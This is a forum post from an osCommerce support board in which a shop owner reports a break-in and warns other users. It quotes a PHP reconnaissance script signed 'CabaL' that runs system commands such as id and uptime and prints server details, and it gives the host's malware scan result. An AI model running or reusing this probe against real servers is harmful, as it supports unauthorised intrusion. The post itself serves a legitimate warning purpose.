Jump to content
  • Checkout
  • Login
  • Get in touch


The e-commerce.

Hackers Entry Point into Oscommerce


Recommended Posts



I've noticed some strange activity on my website. Under who's online I've noticed the following url:




I've clicked on it and the following code was submitted:



function ConvertBytes($number)


$len = strlen($number);

if($len < 4)


return sprintf("%d b", $number);


if($len >= 4 && $len <=6)


return sprintf("%0.2f Kb", $number/1024);


if($len >= 7 && $len <=9)


return sprintf("%0.2f Mb", $number/1024/1024);



return sprintf("%0.2f Gb", $number/1024/1024/1024);




echo "CabaL<br>";

$un = @php_uname();

$up = system(uptime);

$id1 = system(id);

$pwd1 = @getcwd();

$sof1 = getenv("SERVER_SOFTWARE");

$php1 = phpversion();

$name1 = $_SERVER['SERVER_NAME'];

$ip1 = gethostbyname($SERVER_ADDR);

$free1= diskfreespace($pwd1);

$free = ConvertBytes(diskfreespace($pwd1));

if (!$free) {$free = 0;}

$all1= disk_total_space($pwd1);

$all = ConvertBytes(disk_total_space($pwd1));

if (!$all) {$all = 0;}

$used = ConvertBytes($all1-$free1);

$os = @PHP_OS;



echo "CabaL<br>";

echo "uname -a: $un<br>";

echo "os: $os<br>";

echo "uptime: $up<br>";

echo "id: $id1<br>";

echo "pwd: $pwd1<br>";

echo "php: $php1<br>";

echo "software: $sof1<br>";

echo "server-name: $name1<br>";

echo "server-ip: $ip1<br>";

echo "free: $free<br>";

echo "used: $used<br>";

echo "total: $all<br>";



I immediately banned all ips originating from it which was active on my website.


I alerted my server host as well.


My host reported back that malicious code was found on my website which they removed.


/home/*******/public_html/admin/includes/configuration_cache.php: PHP.Obfus FOUND


I'm posting this info here as a warning to other users.


Kind Regards

Link to comment
Share on other sites


This topic is now archived and is closed to further replies.

  • Create New...